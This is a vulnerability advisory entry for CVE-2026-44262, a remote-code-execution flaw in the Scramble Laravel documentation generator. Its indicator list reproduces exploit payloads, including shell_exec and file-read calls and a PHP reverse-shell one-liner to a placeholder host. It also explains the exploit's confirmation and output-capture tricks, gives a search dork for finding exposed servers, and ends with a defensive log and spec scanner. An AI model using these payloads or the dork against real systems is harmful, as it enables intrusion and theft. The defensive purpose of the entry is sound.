CVE-2026-44262
published 2026-05-12


Priority: P276
Severity: critical (CVSS 3.1 base score 9.4)
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
Exploit: available
EPSS: 5.86% (92.3rd percentile)
Scramble generates API documentation for Laravel projects. From 0.13.2 to before 0.13.22, when documentation endpoints are publicly accessible and validation rules reference user-controlled input, request-supplied data may be evaluated during documentation generation, leading to execution of arbitrary PHP code in the application context. This vulnerability is fixed in 0.13.22.

Affected (2 ranges)

Vendor   Product    Version range           Fixed in
dedoc    scramble
dedoc    scramble   >= 0.13.2, < 0.13.22    0.13.22

Detection & IOCs (extracted from sources)

url:      /docs/api.json
path:     /docs/api.json
command:  sleep({SLEEP_SECONDS})
command:  print(shell_exec("id 2>&1"))
command:  print(php_uname('s'))
command:  print(file_get_contents({path}))
command:  $s=@fsockopen('{lhost}',{lport},$e,$m,30);if(!$s)return;$p=proc_open({shell},array(0=>$s,1=>$s,2=>$s),$pipes);if($p)proc_close($p);fclose($s);
  • Monitor HTTP requests to /docs/api.json containing PHP function names in query parameters (sleep, shell_exec, print, file_get_contents, fsockopen, proc_open) — these are injected as Laravel validation rule defaults to trigger RCE.
  • Exploit identifies vulnerable parameters by checking OpenAPI spec query parameter 'default' values that match Laravel validation rule keywords or contain '|' — defenders should audit /docs/api.json schema defaults for user-controlled input reflected as validation rules.
  • The exploit checks for a 200 HTTP response and presence of '"paths"' in the body to confirm the docs endpoint is publicly accessible — alert on unauthenticated access to /docs/api.json returning 200 with JSON body containing 'paths'.
  • Timing-based detection: exploit sends a sleep() payload and measures response delay >= 75% of the sleep duration as confirmation of RCE — monitor for anomalously slow responses on /docs/api.json.
  • Exploit output capture works by reading content appearing before the first '{' character in the JSON response body — PHP print/echo output from injected code leaks before the JSON structure begins.
  • Google dork for exposed vulnerable instances: inurl:/docs/api.json "dedoc/scramble"
  • The vulnerability only exists when the /docs/api.json endpoint is publicly accessible (unauthenticated). Restricting access via middleware eliminates the attack surface without patching.
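As an added example (not from the page's sources or the Scramble project), a defender-side script that applies the two checks above: it audits an OpenAPI document for query-parameter defaults that look like reflected Laravel rule strings, and scans access-log lines for /docs/api.json requests whose query values contain '|' or one of the PHP function names listed above. The combined log format, the keyword sets, and the sample spec and log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

DOCS_PATH = "/docs/api.json"
# PHP function names from the detection notes above, plus a small assumed set of
# Laravel validation-rule keywords; extend both sets to match your application.
PHP_FUNCS = {"sleep", "shell_exec", "print", "file_get_contents", "fsockopen", "proc_open"}
RULE_WORDS = {"required", "nullable", "integer", "numeric", "boolean", "sometimes"}
LOG_RE = re.compile(  # combined access-log format is assumed for the input lines
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def suspicious_value(value: str) -> bool:
    """True when a value reads like a Laravel rule string or names a PHP function."""
    return "|" in value or bool(set(re.findall(r"[a-z_]+", value.lower())) & (PHP_FUNCS | RULE_WORDS))

def audit_spec(spec: dict) -> list:
    """Flag query parameters whose OpenAPI 'default' looks like a reflected rule string."""
    hits = []
    for path, methods in spec.get("paths", {}).items():
        for method, op in methods.items():
            for param in (op.get("parameters", []) if isinstance(op, dict) else []):
                default = param.get("schema", {}).get("default", param.get("default"))
                if param.get("in") == "query" and default is not None and suspicious_value(str(default)):
                    hits.append((path, method.upper(), param["name"], str(default)))
    return hits

def scan_log(lines) -> list:
    """Flag docs requests carrying rule-like query values, and any 200 on the docs path."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or (url := urlsplit(m.group("target"))).path != DOCS_PATH:
            continue  # unparseable line or a request to some other path
        bad = [k for k, v in parse_qsl(url.query, keep_blank_values=True) if suspicious_value(v)]
        if bad:
            findings.append((m.group("ip"), "payload-like-query", ",".join(bad)))
        elif m.group("status") == "200":
            findings.append((m.group("ip"), "docs-reachable", ""))
    return findings

# Constructed sample data (not real traffic and not a real Scramble spec).
SAMPLE_SPEC = {"paths": {"/api/items": {"get": {"parameters": [
    {"name": "page", "in": "query", "schema": {"type": "integer", "default": 1}},
    {"name": "sort", "in": "query", "schema": {"type": "string", "default": "required|in:asc,desc"}}]}}}}
SAMPLE_LOG = [
    '203.0.113.5 - - [12/May/2026:10:01:02 +0000] "GET /docs/api.json HTTP/1.1" 200 5120',
    '203.0.113.5 - - [12/May/2026:10:01:09 +0000] "GET /docs/api.json?sort=shell_exec HTTP/1.1" 200 5210',
    '203.0.113.5 - - [12/May/2026:10:01:15 +0000] "GET /docs/api.json?filter=required%7Cinteger HTTP/1.1" 200 5205',
    '198.51.100.7 - - [12/May/2026:10:02:00 +0000] "GET /api/items?page=2 HTTP/1.1" 200 812',
]
```

A "docs-reachable" finding only proves the endpoint answered 200; confirm whether the request was authenticated before treating it as exposure.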